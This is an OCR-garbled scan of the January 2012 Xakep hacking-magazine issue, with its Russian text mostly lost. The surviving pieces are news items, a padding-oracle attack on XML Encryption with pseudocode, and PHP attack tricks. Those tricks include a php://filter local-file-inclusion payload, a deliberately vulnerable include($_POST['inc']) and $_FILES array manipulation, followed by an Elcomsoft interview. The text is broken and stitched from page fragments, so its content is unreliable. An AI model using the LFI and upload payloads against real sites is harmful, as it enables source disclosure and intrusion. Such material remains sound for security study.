148
Fl 01 [156] 2012 ENCRYPTION XML-KOHTEHTA -·- -·- PHONEGAP : HTML5 -·- ANDROID hf.fun media UJ =.-- -; _0 n:1 iiiiiiiiiiiiiiio www.epidemz.net

Xakep 01_2012

Embed Size (px)

DESCRIPTION

Xakep journal

Citation preview

  • Fl 01 [156] 2012

    ENCRYPTION XML-KOHTEHTA .

    ,

    --

    --PHONEGAP:

    HTML5

    --

    ANDROID

    :230.

    (gam]land hf.fun media UJ =.---; _0 n:1 iiiiiiiiiiiiiiio -~ -N

    www.epidemz.net

  • www.epidemz.net

  • lntro

    : , . , :

    100%. , 250 ,

    . ? , , :

    , . - .

    . : 1-3 , - . ,

    : >> , . ,

    . , nn, , - .

    , . , : . , , , .

    n : 115 !

    shop.g lc. ru/ xakep. , , -

    . : !

    01/156/201 2

    nikitozz, rn. . shop.glc.ru/xakep

    vkontakte ru/xakep mag

    -,rp.HEP ..... ~

    -

    PC_ZONE UNIS

    nikitozz )) [nikitozfareal.xakep.rul ctstep (steprareaJ. xakep.ru )

    c(gorl ([email protected])

    Step)) [stepffireal.xakep.rul (magglareal.xakep. ru l

    MALWARE SYN/ACK UNIXOID

    . Klouniz (alexanderfareal xakep.rul ccdushock>> (adushockfareal.xakep.u )

    R- xakep.ru

    DVD Ui- Security-pae

    ART

    ccgol)) (golumfaeal.xakep.u 1 (pofakumekay.com) [ g igorievafaglc . ru ) ixafaeal . xakep. ru l

    ant)) (antfareal.xakep.u l ccAd ushock andrushockfareal.xake .ru) 01g1 >> levdokimovdsfagmail.com)

    (aliklaglc. rul

    -

    : . : .

    PUBLISHING 000 , 115280, , . , 19, n, 5 , No 21. .: 1495/935-7034, : 1495/545-0906

    no

    -

    . : 1495/935-7034, : 1495/545-0906

    n TECHNOLOGY

    -

    ( f il atovacl glc ru l (olgaemlfaglc.ru) /alekhinalaglc.rul

    ([email protected] ( ] (ta tarekova@g lc .ru l /gospodinovataglc u l ([email protected]/ (bulanovalaglc.rul

    /korenfeldlaglc.rul

    l koshelevafaglc . u ) [email protected]]

    llukichevafaglc.ru )

    : V- : claimfaqlc.ru . n : (495)545-09-06 nn : 1495/663-82-77 : 8-800-200-3-999 : 101000, , , / 652,

    , 77-11802 14.02.2002 n Zapolex, . 219 833 .

    . n . , n , . . - n. : contentrglc.ru . 000 , , 2012

    001 www.epidemz.net

  • HEADER 004

    011

    MEGANEWS hacker tweets -

    COVERSTORY

    018 L Encryption

    L

    016

    017

    OMOHKASIRI

    004

    8 Dropbox AdWords Proof-of-cocept SS- 100

    COVERSTORY

    030

    COVERSTORY

    ,

    Adobe

    www.epidemz.net

  • 036

    042

    046

    PCZONE hnG:nL5

    Windows-apoe

    Widows-cce

    Widws-?

    - 050 Easy-Hack

    054

    060

    064

    068

    072

    D5

    - SpyEye Lotus, Lotus Oomio tll X-Tools

    074 --

    - MALWARE 080

    084

    Wi32/0uqu: Stuxet

    : bootkit test BitDefede, ESET NOD32, F-Secue, Outpost Secuity, Risig >>

    - 088 .N-

    .NET Famewok

    094 ,

    098 -

    - UNIXOID 102

    107

    112

    117

    Linux ! tcpdump

    did-

    - Ubuntu 11.10 Oneiic Ocelot

    - SYN/ACK 118

    122

    - FERRUM 126 NAS

    130

    -132

    -136

    139

    142

    144

    5- 6- NS- Silicon

    PoweSP060GBSSOV30525

    PHREAKING Loop

    , n n n

    FAOUNIED

    FAQ 8.5 WWW2 w-

    2012 NY2k+ 12

    www.epidemz.net

  • EGANEWS SIRI

    OMOHKASIRI

    111 '.1 ~.)

    " On 19 rem1nd me l 's dad's b

  • ltel 11 11 -11 11 11 11 , . ltel 2011 . . ltel, ltel , ltel . . * .

    www.epidemz.net

  • MEGAN EWS & F , 600 .

    POLAROID !

    2008 n Polaoid ,

    w 11- . ,

    Polaoid

    n , 11-

    n n .

    Polaroid : Z340 lnstant Digital Camera. ZINK

    Zero lnk Printing, n n . ,

    n >> , . n, . , , n ,nn

    n . 14 Mn. n 2, 7"

    SD. I 43 ] F/3,2. [ -1280 720 n]. Polaroid Z340 n 76 102 , $20 30 . - ,

    , no , 25 n. n , Polaroid. Z340 lnstant Digital Camera $300.

    AVIRA AESCRIPT.DLL 006

    DNS ,

    , DNS-apeco.

    , , -

    n. DNS - Hotmail, Gmail, Google, Microsoft

    , Uol, Terra Globo. , , , google.com ,

    I- Google, -. n

    . n, Google n

    n Google Defender, n .

    , , 27- n ,

    n DNS-cepepax , DNS-.

    , , n Ghost Click .

    -

    , n DNS Changer. OS Windowsoep DNS. I- n 15 ! ,

    , n . 100 , n 500 n .

    [ n], n

  • www.epidemz.net

  • MEGANEWS , CONSUMERIST, RIAA .

    ! , WI-FI,

    , , , . , , . -, ,

    10 , /GS. ,

    , , , , 802.11 .

    -, . , ,

    , [ 100 ), 802 .1 1, .

    , . , ,

    . , - , - .

    . , - , .

    iPhone45,

    ,

    , . Apple n

    - :).

    Jj ._d

    -

    .....

    ~

    -

    ~ KaneOIAII~

    WEXLER.BOOK 7001. Wexler WLR. 7001 7.0" , . 4

    ( 32 microSDI , , ; F. -

    1500 mAh, , . ,

    . WEXLER.BOOK 7001 . : 5 990 .

    008

    . , 1.6.4. . ,

    , . , ,

    . , , ,

    . , CMS,

    , . , 1.6.4, 6 , . ,

    . . , .

    [CDN) .

    ,0 -'- - ~ - - - -., ,_",,.,,.. 1 - " _ ,._""_, ___ - - ,.

    Firefox with Bing

    ing

  • t'

    ' !..' -' -

    ..;;.

    ~ r . ' . -z.. .. \--.:,,,.

    j ll_ ~:-~

  • MEGANEWS ENTENSYS COMMTOUCH , 6, 7% n .

    ,

    >> .

    YouTube : Aoymous [Zetasl . , >> , , >> , . , 26 2011

    - - . , - .

    -. Anonymous , - ,

    . , , , -

    >> , , . , OpCatel [n

    ~. , , , , .

    , , - , OpCatel .

    . . , ,

    , , . . .onion- Hidden Wiki,

    . , . - , Feedom Host ing. ...

    : Feedom Hosting, 40 ,

    :

    010

    Lolita City - , 100 . Feedom Hosting, , >>. Opeat io n Daknet

    S- . , Lol ita City SQL- . , , ~ .

    n: pastebin . com/1 LH nzEW.

    n Anonymous n

    . n , ,

    - 2000-6000 . 38

    .

    01 / 156/2012

    www.epidemz.net

  • laEdiStrosar: , >> [ l.

    cljkouns: . Ggl-- .

    I-: http:!/4 .. 2; http:/196.4; ht.p://71.3; ht.~. ...

    ciRogunix: DS/- ICMP efCount TCP/IP [MS11-083I 232 UD-, , 250 52. t.co/aY.PCMyRy.

    lafjserna: Micosoft/MSRC . ! Google. ++.

    1!!!1 : lilil -

    , , , . !

    01/156/2012

    .

    laiLLUMINATI: ,

    .

    ciWeldPond: Google,

    OllyDbg IDA _noRE.exe

    .

    1!!!1 : lilil -. :1

    , Google Wi-Fi, _nomap. :1

    clinsitOr: Oday BIND.

    : DNS-cepepa BIND, DoS Oday.

    Shodan , Siemens Simatic.

    t.J;o 1l1Q0b3cq.

    1!!!1 : lilil . SCADA-

    . S- - .

    clmikko: -

    , :

  • MEGANEWS ( 926 ), , . .

    ! ,

    IO'f2~htountry ol~oi!Wpail~ tioUIIpi8CIIIftlleM PC.WNieO.US,...IJ .,_ICWIIIcll'rlllf. ~llwpop~ WUII~4if ... tflt.tllilo -!I\IC11WiW .-,.un ,...,. loulwdCIidlotor&DfiOclns' l'lt ......... IOif ,_,.,otortcrn-

    - ~ lociJtionofinfected computers

    Nito, ,

    .

    .

    Stuxnet, , - , n , n . , , Symantec. ,

    Nito, n , . 29 19 , [,

    ]. n , n. - , .

    [ Poisonlvy]. , . Symantec ,

    . Nito : , .

    & . ,

    .

    012

    & BSUP a . ,

  • MAIL.RU GRU , Twitter. , .

    HAANDROID'E

    FXI , The Cotton Candy

    $200, n 2012 . ,

    cWindows 8

    .

    FXI . The Cotton Candy [ - , 21 , , ! . U5-,

    . R- 5amsung Exynos 1,2 [ , 5amsung Gala xy 5111.

    Mal i-400 , micro5D [ 64 I , Wi-Fi Bluetooth, HDMI2 .1 U5B 2.0. ,

    n 1 . h Cotton Candy Android 2.3. , , , Android.

    . HDMI, U5B [ n !. Bluetooth , .

    Android Market, .

    , GOOGLE ?

    SSID ,

    GOOGLE 01 /156/2012

    BITCOIN , BITCOIN

    n BitCoin n .

    , , . ,

    n Mt Gox, BitCoin, , . , BitCoin , , , n

    .

    lntego, ,

    Devii Robber, BitCoin . . ,

    , , , , Bi tCoin, , . DeviiRobber 05 ,

    n . The Pirate . ,

    Graphic Converter 05 . n ,

    . , Devii Robber itin - , .

    . Devii Robberae , 5afari Vidalia- Firefox, TOR. , D evii Robberoapye

    , , . BitCoin . Oper

    Microsoft n ,

    . , BitCoin.

    : 1 n 2, , 50 , 1 .

    , n , . ,

    , n , Bi tCoi n. - .

    n ,

    . , . , .

    , BitCoin, :

    n , , - >>.

    013 www.epidemz.net

  • MEGANEWS LINUX3.1, kl .g .

    CTAHAADOBE FLEX FLASH

    d Flash n 750 ( 7

    % n!

    n .

    dobe n n n Fla sh l . Fla sh n n , n n Adobe Al R n n.nn n Android PlayBook, n

    n . Flash Player n n n HTML5. n n , n n Flash. , , n Apple, , n-n

    n Flash Pl ayer iOS. , Flash Playe r n Apple iOS

    ,- n . Adobe Fl ash n - >> Apple. , n Flex SDK. Flex 4.6 SDK, 29 , n n source.

    , , ,

    , , n . , , , n . iSpy n 100%. , , n

    iPhone ndid n

    [magnified keysl. iSpy n n, n,

    n n - ! , .

    n , 60 . n n 90% . n , n . n , , n n . n DSLR-aep n n 12 . iSpy

    magnifi ed key n - .

    . DARPA Shdd Challenge

    . , .

    50 .

    AMAZON .

    , 2012 .

    GGL

    42 47 .

    011. 01/156/2012 www.epidemz.net

  • 500 Wikimedia.

    IPHONE ~~>>

    . ",--"

    iPhone Dev-Team n iPhone4S.

    , .

    n, , .

    iPhone 45 ,

    . Chonic DevTeam - iPhone . , , ,

    iPhone, & , .

    , , , , iPhoe 45, iPhoe

    : iPhone 4 iPhone 3G5, . , ,

    >> . , , . : 51 - & , , ,

    . & ! >>, >>, , l.

    , - youtu.be/gofpeiTXI5U. :

    & 1611) ; ; 51 - & T-Mobile; , Wi-Fi !

    , );

    , iPhoe ; ; EDGE ;

    20-30 ; iPhoe, ;

    MCAFEE:

    space

    , >; 51 -, ;

    51 - T-Moile . . ,

    iPhoe T-Moile, .

    75 01 / 156/2012 015

    www.epidemz.net

  • .HEADER

    Proof-of-Concept SS-

    100

    , . , SQL-, , , . , ,- sql-map, SQLi

    . , SS- . - . Damn Small XSS Scanne [DSXS).

    XSS . Coss-site scipting [XSS]- n , n

    n JS-. n . SS- n

    . - , , n, n -.

    n- n. n n

    , SS-.

    n XSS zero.webappsecurity.com

    016

    SS- - n. n- n , n

    -n n . n

    n L- n GET/POST-anpoca .

    [ ] , n .

    , n, n SS-n. , -n

    . ,

    n . n,

    L- .. [ n ] ,

    n JavaScipt-o. , n, n L- ,

    > n n JS-, ... .

    DSXS , n SS .

    ? n Python,

    GET- S- SS-,

    . Damn Small XSS Scanne [DSXS]

    , -, .

    , ,

    n . n , , n , ,

    > - . DSXS ,

    . -, DSXS , . n, . n [

    , n n], . ,

    n. , , n n

    Use-Agent, Rf Cookie - . n GitHub [https:Ugithub.com/ stampam/DSXS ]. ::

    01 / 156/ 201 2 www.epidemz.net

  • HEADER

    10 DROPBOX ADWORDS 10 2 D , , , . 2 ,

    50 , . - $99,00 . , , - 250 . , 1 , ,

    - . , , D,

    -. , , [, it . ly/ud69i ]. ,

    , D - - , , . , , 10 , D

    . AdWods !

    ? , [ it.ly/xNKyB ]. , D- .

    , . ? , ,

    . - . , AdWods, . ?,,- . , ! , Google, 1000 . . . Qit. l y/AEsg1 $75 AdWods, ,

    .: ] , e-mail [ - ], [ - about.me], . e-mail.

    [ ] .

    ? ? , ,- Google AdWods [adwods.google.com ].

    -7 >> . [ , , ],

    01/156/2012

    . [ ] : 1. . 2. [, D]. 3. ,

    [, , , , ].

    3. >> : , 600 .

    . >> ,

    . : d, f oline stoage, online backup f, online backup, online backup data, d space.

    , - , Google.

    URL , D Refeall Status [, httR:Udb.tt/UfxuFBm ]. , .

    , , . ,

    . , [Cost-Pe-Ciick].

    , . -

    , , . :] ? - ,

    D. -, . -, AdWods, , , [ Google]. . :] :::

    Updated Statu.s

    3/ 26/ 2011 7:4 5 Joined

    3/26/ 2011 6:52 .. Completed

    3/ 26/ 2011 6:37 , Joined 3/ 26/2011 6 :08 Joined

    3/ 26/2011 5:23 Completed

    3/26/ 2011 5:14 Completed

    3/ 26/2011 4:49 Completed

    3/ 26/2011 4:32 Completed

    - 250 Dropbox

    017

    www.epidemz.net

  • COVERSTORY

    =

    BEAST Padding Oracle Attack .NET Framework,

    XML Encryption,

    L-.

    .

    018

    www.w.org/TR/ mln-r/n XML Encryption

    w .

    bit l/ur , XML Encryption.

    lplaintextl llirstfaplaintext .su, www.plaintext.sul

    XML ENCRYPTION XML Encryption, W 2002

    , n XML Framewok "ax [ n .NET, Apache Axis2, JBOSS . .[.

    - n, Microsoft Red Hat. XML Encyptio n n ,

    L- ,- , L-- . n , n

    . , AES DES . n n AES [ nn, - CBCI.

    01/156/2012 www.epidemz.net

  • ISJ*iiirIId , n [ 16 , 128 ! . ,

    , .

    n ~ . IIVI, XOR,

    . , :

    //

    [ 0 ] AES_ENC(k, IV xor [ 0 ]); C[ i] AES_ENC(k, C[i- 1] xor M[i]);

    //

    [ 0 ] M[i]

    AES_DEC(k , [~) xor IV; AES_DEC(k, C[i] ) xor C[i-1] ;

    k- , - , - , IV- ll.

    n . .

    , , : ,

    . , , 12

    Dx05. ! 16 !, , 15

    , 16- 10.

    , XM L Encyptio.

    ! !

    01/156/2012

    XM L En cyption

    IV1[0]

    , BEAST Paddig l Attack. -

    . . , , n XOR IV MSK, IIV MSK, C[DJI [) MSK. , .

    , MSK, n , . ,

    . , , . XML Encyptio , .

    , , , ASC II . ASCI I . , NULL ! Al,

    ! Bl. , , , >>. ,

    , n . ,

    , 16 , tue, [) = AES_DEC_ CBC[k, IIV, C[OJII NULL, false -

    . , , .

    : 1. IV1,

    [I V1, C[O] I . niV, lniV, C[O]I . tu, IV1 = iV, false .

    019

    www.epidemz.net

  • COVERSTORY

    WS-SECURITY

    WS-Security - SOAP, _

    -. WS-Secuity XML Encyption XML Signatue.

    , 2-3 , , , .

    2. [, AES_DEC , ! . :

    msk = repeat

    msk++ IV2 = IVl xor ( . .. e llmsklle ... )

    11 msk j -

    until Server((IV2, [ ] )) == true

    retur X[j] = ASCIICode(NULL) xor IV2[j] 11 "

    :

    Iput: C=(IVl, []), -

    Output: j- X[j] = AES_DEC(k, [])

    . j- , , j- . , ? : . [

    !:

    AES_DEC_CBC(k, (IV2, [])) IV2 xo r [].

    IV2 xor AES_DEC( k, [])

    ,

    I . [] ,

    [0]. XOR [] IV.

    . .

    XML XML ENCRYPTION Extesie Makup Laguage [ XM LI . XML ,

    [odel. , , XML < >

    . & s- & >>. XML XML ti.

    W XML Sigatue W XML ti, XM L [

    , . .l XML.

    XML ti, . , ,

    [ , , . . l . , , , .

    . . ,

    , . .

    John Smith l

    A123456 ...

    XML Encryption

    020 01 / 156/ 2012 www.epidemz.net

  • n n , . n n n,

    n L- . , L-, . ?:-]

    XM L ti n n L- ! XML], n . n n . n td Element -, L-

    . Encypted Content , n

    , , . . n Encypted Text Contet, n Encypted Contet, , . , n n

    . , n XM L Famewok'o n n .

    - . XM L E cyption n n

    UTF-8, n , n

    . n UTF-8- , , lline feed ]

    lcaiage tu]. , n ASCII n UTF-8.

    n, ASCII n n 128 ! 4]. ,

    , .

    n n -. nn Apache Axis2 Famewok, Rampat WS-Secu ity. n XML Encyption XML Signatue SOAP.

    n Axis2 Famewok, n lmessage flow]. lmessage flow]- n , S- ! ],

    n n. S- n, n Message

    Receive, , , Sevice n .

    Axis2 : st, Secuity Dispatch. Secuity,

    XM L SIGNATURE

    XML Signature - n W. n n n XML.

    01/156/2012

    XM L Encyption

    ?

    v Secuity, . , , , . . ,

    !, , -, , . ). -,

    , , . Axis2,

    ,- -. Paddig Oracle Attack,

    l-, ASP.NET), .net.

    , . , XML S-.

    Dispatch. Message Receive, message flow SOAP n , .

    , Axis2 . :-]

    AXIS2 - , Axis2. ,

    , tue false

    . n secuity fault. secuity fault : 1.

    . , , , ? , n 001 OxlO, n n .

    2. . n>> , ASCII Oxl F ! 09, , D- , ].

    - L- , & IOx26] > > .

    .

    n , ASCII ! ]. n n XML n >> >,

    .

    021 www.epidemz.net

  • COVERSTORY

    . , , , ,

    , 16- , tue false. ,

  • Dec. Char . Dec. Char. Block Block 2 00 NUL 32 20 SPC 1 01 SOH 33 21 ! 2 02 STX 34 22 " 3 03 35 23 # 4 04 36 24 $ 5 05 ENQ 37 25 % 6 38 26 & 7 07 BEL 39 27 ' 8 08 BS 40 28 ( 9 09 41 29 )

    10 LF 42 2 * 11 VT 43 2 +

    12 FF 44 2 ' 13 OD CR 45 2D -

    14 so 46 2 15 OF SI 47 2F 1

    Block 1 Block 3 16 10 DLE 48 30 17 11 DC1 49 31 1 18 12 DC2 50 32 2 19 13 D 51 33 3 20 14 DC4 52 34 4 21 15 NAK 53 35 5 22 16 SYN 54 36 23 17 55 37 7 24 18 CAN 56 38 8 25 19 57 39 9 26 1 su 58 : 27 1 ESC 59 ; 28 1 FS 60 < 29 1D GS 61 3D = 30 1 RS 62 > 31 1F us 63 F ?

    ASCII

    , . [ ,

    ] [ ]. , , XML 5chem'

    [L-] . , ,

    , , , . ,

    , .

    [ . ], u .

    ~ , ,

    XML 5ignatue. , n XML 5ignatue Wappig, , n

    nn / . n- , n n .

    01/156/2012

    XML Encyption

    Dec. Char. Dec. Char. lock 4 lock 6

    64 40 96 60 ' 65 41 97 61 66 42 98 62 67 43 99 63 68 44 D 100 64 d 69 45 101 65 70 46 F 102 66 f 71 47 G 103 67 g 72 48 104 68 h 73 49 I 105 69 i 74 4 J 106 j 75 4 107 k 76 4 L 108 1 77 4D 109 6D m 78 4 N 110 n 79 4F 111 F

    Block 5 Block 7 80 50 112 70 81 51 Q 113 71 q 82 52 R 114 72 r 83 53 s 115 73 s 84 54 116 74 t 85 55 u 117 75 u 86 56 v 118 76 v 87 57 w 119 77 88 58 120 78 89 59 121 79 90 z 122 7 z 91 5 [ 123 7 { 92 5 \ 124 7 1 93 5D ] 125 7D } 94 5 - 126 7 - 95 5F

    -

    127 7F DEL

    . - , n -, -, n . n -, ,

    n. , , ,-

    , , [, 150/IEC 19772:2009], n

    XML Encyption . , , 051 [n, XML Encyption 55L/TL5, n 5] .

    , , , , epic fail . , XML Encyption n , n n side-channel, n . , , - , n . n Juaj 5omoovsky i Jage, , n n . ::

    023 www.epidemz.net

  • .

    fopen, , file_get_ contents . .

    , ,

    .

    PrOxor [php.m4sqllagmail.com, rdot.org/foruml

    $ FILES

    , .

    '-"

    1 il. ly/sfDcys

    noce L ightig Template.

    blt.ly/ttvWV -n Lightning-Template.

    it.!y/mdrdqfca,

    File path injection. pastebln.com/1edSuSVN - n

    File path injection.

    it . ly/g6ztD- ,

    $_FILES.

    n

    n .

    , , 4.3 . [

    , . . l > . .

    , , . , :

    print _r(st r eam_get _fi lters());

    , . steam _filter_append/

    ~~ . .. ....

    - ....

    _ ___ ,.

    .....__llriWolo,.., 1 ....... -.

    ... ... ,.., .L.oc ...... ",....,__Pif' ': , ~qt\0~ lt II PHDOd( ' lllrJWII ' ) I , .

    , .. '.. t-l&tO ftiH~ t ... t - tM kLU I ~>laLO""

    -I. ,koll -~-" . -l" or t llo """'""' ""-1 : r_t...., ...,.. --.1-..... " ot cooLol lotpor.,. ...,.. N-ltd tM-

    n. ~r .,... - tA8'p tr.., tor 'Dltto -L

  • steam_filte_pepend n n php://f ilte. , , . :

    $fp = fopen( 'php ://output ' , ' w' ); stream_filter_append($fp,

    'convert . quoted-printae-encode ' ); fwrite($fp, "I \ v Love \ v PHP .\n" );

    , POST, Base64 :

    readfile( "php: //filter/ read=convert . base64-encode/ resource=php: // input" );

    , , . , ft-, gz-, :

    copy( 'compress.zlib: // ftp:/ / user:[email protected] : 21/ path / file. dat. gz' , '/local / / of / file . dat' ) ;

    php://filte - . ,

    include ($_POST[ 'inc ' ]) ;

    allow_ul_ic l ude = Off>> RFI.

    -- S- :

    inc=php://filter/read%3Dconvert.base64-encode/resource%3D/ path/script.php

    , - . !

    ~ , , , . - . ,

    12. . , filte ! ] .

    , . $this-> _data >> :

    private $_data;

    while ($bucket = stream_bucket_make_writeae($in)) $this- >_data .= $bucket->data; $this->bucket = $bucket; $consumed = ; }

    , $closing TRUE. :

    01/156/2012

    if($closing) { $consumed += strlen($this->_data); $str = nl2br($this->_data); $this->bucket->data = $str; $this->bucket->datalen = strlen($this->_data);

    i Secure [9ist.github.com/600388/cd99ae03c3

    {{ tit1e }}

    {{ tit1e }} 11 {{ name }} 1 {{ meagelafe }}

    Iteiil {% fo~ ite!il in ite!il %}

    {% if ite!il %} {{ ite!il }} {% endif %}

    {% endfo~ %}

    sample.php #

    < ?php require_once 'Lightninqemp1ate.php' ;

    ~ite!ils = array( 'hoge' , null, 'fuga' , , 'piyo' ,

    h ) ;

    $1t = new Lightninqemp1ate( '8Iilp1e . htm1' ); $1t->tit1e = 'Samp1e Temp1ate' ; $1t->n8Ule = 'Yo~1d' ; $1t->Iilessage = 'hi'' ;

    lG $1t->ite!ils = $items ; echo $lt;

    1

    sarnple_cache.php #

    1 1

    < ?php require_once 'Lightninqeiilp1ate . php' ;

    te!ils = array ( 'hoge' , null, 'fuga' , , 'piyo' ,

    );

    $1t = new Lightninqemp1ate( 'amp1e.htm1' ,

    new Lightninqeiilp1ateCache_Fi1e( '. /cache' ) ); $1t->title = ' Samp1e Te!ilp1ate' ; $lt->n8Iile = 'Yo~1d' ;

    $1t->meage = 'hi!' ; $1t- >items = $ite!ils ;

    n Lightning Template

    025 www.epidemz.net

  • COVERSTORY

    }

    if ( !empty($t his->bucket - >data)) stream_bucket_a ppend($out, $th is->bucket);

    return PSFS_PASS_ON;

    , PSFS_PASS_ON. ,

    . . :

    stream_fi lter_register( 'convert.nlZbr_string ' , 'nlzbr_filter' );

    , .

    , ,

    , . Google Code Seach. steam_filte_egiste.

    Lighting-Temp l ate ! !, . , sample.html:

    {{ tit l e }}

    2 class nl2b_fi~e extends _Use_F i~e { 3 private $_data; 4 /* n t 5 function onCeate ( ) 6 { 7 $this-> _data = "; 8 eturn true; 9 }

    1 /* n / 11 puiic function fi~er($ i n , $out , &$consumed, $closing) 12 { 13 /* 14 '$_data' 15 . , 16 while($bucket = steam_bucket_make_writeae($ i n)) 17 { 18 $this-> data .= $bucket->dala; 19 $this->bucket = $bucket ; 20 $consumed = ; 21 22 23 /* 24 (ukt). 25 ., 26 if($closing) 27 { 28 $consumed += stlen($this-> _data); 29 $st = nl2b($bucket-> _data}; 30 31 $this->bucket->data = $st; 32 $this->bucket->datalen = stlen($this-> _data); 33 34 if(!empty($this->bucket->data)) 35 steam_bucket_append($out , $this->bucket); 36 37 etum PSFS_PASS_ON; 38 39

    026

    include ( "./LightningTemplate.php" ); $lt = new Light ni ngTemplate(' . / sample.html' ); $lt->title = ' Title' ; echo $l t;

    L-:

    < head> My Title

    , L- . , include,

    . , - , . ,

    , L-. :

    puic function fi l ter($i n, $out , &$cons umed, $clos i ng) while ($bucket = stream_bu cket_ma ke_writeae($in))

    $patterns = array (

    '1\{%\s+if\s+(.+?)\s+%\}/e' ,

    ); $replacements = array (

    '"'" ,

    ); $bucket->data = preg_replace($patterns,

    $replacements, $bucket->dat a) ;

    , '"

  • - php_use_filte. : filte, t, oCiose. filte, : 1. $i - , ,

    .

    - , phpseUm44, hello.txt.

    , !

    ). $_FILES :

    Array ( [uploadfile] => Array (

    [name] => hello.txt [type] => text/plain [tmp_name] => /tmp/phpseUm44 [error] => [size] => 33

    , $_FILES[uploadfile][type] Cotent-Type, . , -,

    , :

    $_FILES[ " file " ][ "type" ] == " image/ gif"

    , , . getimagesizel). , , , IF-

    , . , . , - pic.php.myext -. , - , . , $_FILES.

    , ,- . bugs . php.et ,

    , - . :) ,

    / , $_FILES[uploadfile] [name] . , , -. Uni-

    027 www.epidemz.net

  • COVERSTORY

    - . Windows-aax n . .

    . $_FILES. Qwaza d ot.og . BlackFan, , , . . , ,

    :

    foreach ($_FILES[ "file" ][ "tmp_name" ] as $key => $name) { echo "Size:" .$_FILES[ "file" ][ "size" ][$key]. "cbr/>\r\n" ; echo "tmp name: " .

    $_FILES[ "file" ][ "tmp_name" ][$key]. "cbr/>\r\n" ;

    if($_FILES[ "file" ][ "size" ][$key] >0 && $_FILES[ "file" ][ "size" ][$key] date); ..... ,

    :. lt: : NOICI : defa.lt :

    lithis->tiarra->nouce:l!essaqe (lit.hi.s->da.tal: "....,

    licon:sua!:d - Sbuc.t:et- >do.t..a.le:n; streaa_ucket_app~d ( ,out, 'uctet);

    r:il r i nitiali:r:e:r

    @retum bool '1

    .-uc h8ctioa o.c:reu.e () (

    (1sset( lit.his->par;8:a5{ 'socket' ))) ( lisock~m.aa~ ~this->parus[ 'sock~t' ];

    U ( 1.ss~ t(Hh1s->paraas{ 'chann~l' ])) ( HJus- >channe.l - ~thls->poru.s{ ' chann~l' );

    U ( 1.ss~t(~th1s->par~ [ aobl' JI) ( Sth1s->ted~ Sth1s->araas r 'aod~' 1:

    onCeate n

    028

    cform action= "upload.php" method= "POST" enctype= "multipart/form-data" >

    cinput type= "Hidden" name= "AX_FILE_SIZE" value= "leeeeeee" >

    cinput type= "file" name= "file[size][" >

    cinput type= "submit" value= "submit" >

    - $_FILES :

    $_FILES[ "file" ][ "tmp_name" ][ "[name" ]

    n :

    $_FILES[ "file" ][ "tmp_name" ][$key]

    , $_FILES ( , ) . , .

    ( upload.php), L-, secet. php, , upload .php,

    : 1. secret.php,

    (, , ). 2. , .

    0

  • . , , .

    , imageceatefom* ,

    , l , .,

    , . , base64_ecode , , , :

    $jpegimage = imagecreatefromjpeg( "data://image/jpeg;base64J" . base64_encode(

    isql_result_array( 'imagedat~])); imagejpeg($jpegimage);

    , , .

    , ,

    . , , .

    , -, , , , imageceatefom*/image*, :

    foreach ($_FILES[ "file" )_( "tmp_name" ]_E.L$key => $name) { echo "Size:" . $_FILES[ "file" ][ "size" ]($key]. "\r\n" ;

    }

    echo " tmp name:" .$_FILES["file" ) [ "t>_name" ]($key]. "\r\n" ;

    $img = imagecreatefromjpeg( $_FILES [ "file" ] [ "tmJJ_name" ] [$key]);

    imagejpeg($img, ' ./new_' .$ke:,

  • COVERSTORY

    S, I

    & - . . n

    - - - : n: ~~ n.

    0 .

    E\comsoft. ona:~vanced eBook ss, n_~1 , - Defcon.

    www.epidemz.net

  • r.t - .... , IT, , ?

    il ! ~ . .- . ][J,

    , 6. - 100 . . 20 . . ,

    - ... , , - , . -

    . . , - ,

    . , , - ...

  • COVERSTORY , , . , , , : . , , . - , . , , ,

    , .

    ?

    1 ~ ,

    - ,

    . . , . , ,

    [ 97- ! . , , ,

    IT. . , , , 80 %.

    Elcomsoft, . , , , , . : .

    . n

    , ... .

    r.1 .:;.t ELCOMSOF

    ?

    l , ~

    . passwod v, , . , , . .

    , . , EFS

    Recovey . - , Active diectoy.

    compute foesics . , ,

    , .

    , , , -

    . , Defco 2001

    , - . - , - . - .

    , . , . , , ,

    , .

    .

    , , ELCOMSOFT.

    1 . ~ Access, . ,

    ... . , , . - , -

    032

    . :1

    1 , ~ ,

    . - , , . 90-

    - , . Elcomsoft, . .

    r,1 , .

    1 , , , ... ~ ,

    Apple, iOS [ , iPhoe 45 iPad21. , . , ,

    . , ,

    .

    r.1 APPLE .:;.t ,

    , ? ADOBE .

    l , ~ ,

    compute foesics. , , . , ... Apple , . , , .

    r.1 ... PDF

    ELCOMSOF ... ?

    l , pdf . ~

    . : >.

    - . , .

    r.1 .:;.t ADVANCED PROCESSOR, - 2001 DEFCON?

    l , . , ~ ,

    df-, . 2001 .

    ,

    , . , , . . Defco. , ,

    12 20 . , , , Adobe.

    . Defco , Advaced eBook ss,

    . , , ,

    .

    m ? :1 01 /156/2012

    www.epidemz.net

  • l , ... , ~

    , . - Spot the fed ! ).

    !, ),

    , , - .

    , , , - ,

    . . , , , ,

    , .

    r.1 , . 1.;.1

    , , .

    l ~ ~ ,

    01 /156/2012

    , , . , , . ,

    , , . .

    . -.

    . , ,

    . : ,

    . -,

    11 . . , - ,

    , , , , . . , , . :

    . , , .

    . , .

    - , . , , , , , .

    - .

    r.1 , 1.;.1 ? ?

    l _ . ~ ,

    , 21 . , .

    , . 11 -, ,

    . , . - , , , ... ,

    . :) , , - .

    , . , , . - . , - .. .

    , .

    r.1 , 1.;.1 ADOBE

    ?

    l , , -, ~ Adobe

    . - ,

    Adobe, . Adobe , , . , : . ,

    .

    , , ?

    , , Elcomsoft. ,

  • COVERSTORY , .

    , , , , , . ,

    . , n

    .

    r.1 ... ?

    l , l -) ~ 50

    , Elcomsoft. , , , .

    , . , . , , . .

    , , - , . . ,

    2001 , 6 , 2002

    . , ! ), : , , , . depositio

    ! ) - . , : - ?>>. , : .

    , Elcomsoft

    . . 2001 , .

    r.1 , , ... 2002.

    ?

    l Elcomsoft ~ ,

    Puic lteest l. , , 17

    Elcomsoft . . , ,

    . .

    ,

    ? , , - ?

    l . ~ .

    , .

    , - , . , .

    , , .

    r.1 ~- ... , ?

    ?

    l , ~

    . . - .

    r.1 , ...

    . ?

    l , ... ~ . ,

    . , , -

    , .

    ?

    - , . , , ...

    , , , . ,

    , ,

    . 9 .

    r.1 CONFIOENCE 2.0 ...

    CANON. ?

    l , ~ I) .

    - , 3000, ,

    , 3500. , n

    , , , ,

    . n 300,

    . , .

